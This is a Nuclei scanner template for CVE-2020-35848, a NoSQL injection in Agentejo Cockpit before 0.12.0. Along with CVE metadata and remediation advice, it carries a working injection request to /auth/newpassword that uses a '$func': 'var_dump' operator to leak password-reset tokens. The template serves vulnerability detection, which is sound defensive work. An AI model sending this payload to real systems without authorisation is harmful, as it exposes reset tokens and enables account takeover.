nuclei-templates/http/cves/2020/CVE-2020-35848.yaml

51 lines
1.8 KiB
YAML

id: CVE-2020-35848
info:
name: Agentejo Cockpit <0.12.0 - NoSQL Injection
author: dwisiswant0
severity: critical
description: Agentejo Cockpit prior to 0.12.0 is vulnerable to NoSQL Injection via the newpassword method of the Auth controller, which is responsible for displaying the user password reset form.
impact: |
Successful exploitation of this vulnerability could allow an attacker to manipulate database queries, potentially leading to unauthorized access, data leakage, or data corruption.
remediation: |
Upgrade Agentejo Cockpit to version 0.12.0 or later to mitigate this vulnerability.
reference:
- https://swarm.ptsecurity.com/rce-cockpit-cms/
- https://nvd.nist.gov/vuln/detail/CVE-2020-35848
- https://getcockpit.com/
- https://github.com/agentejo/cockpit/commit/2a385af8d80ed60d40d386ed813c1039db00c466
- https://github.com/agentejo/cockpit/commit/33e7199575631ba1f74cba6b16b10c820bec59af
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-35848
cwe-id: CWE-89
epss-score: 0.75372
epss-percentile: 0.98077
cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: agentejo
product: cockpit
tags: cve,cve2020,nosqli,sqli,cockpit,injection,agentejo
http:
- method: POST
path:
- "{{BaseURL}}/auth/newpassword"
body: |
{
"token": {
"$func": "var_dump"
}
}
headers:
Content-Type: application/json
matchers:
- type: regex
part: body
regex:
- 'string\([0-9]{1,3}\)(\s)?"rp-([a-f0-9-]+)"'
# digest: 4a0a0047304502204c5e621f8e72efbb78024a1d448302c1b840c428b84bd1d8c46c91a239f8fae40221008c5563e6e9537a8190b64c882918cb880fa670f4410e0ff17c0d132bd4ffb4ab:922c64590222798bb761d5b6d8e72950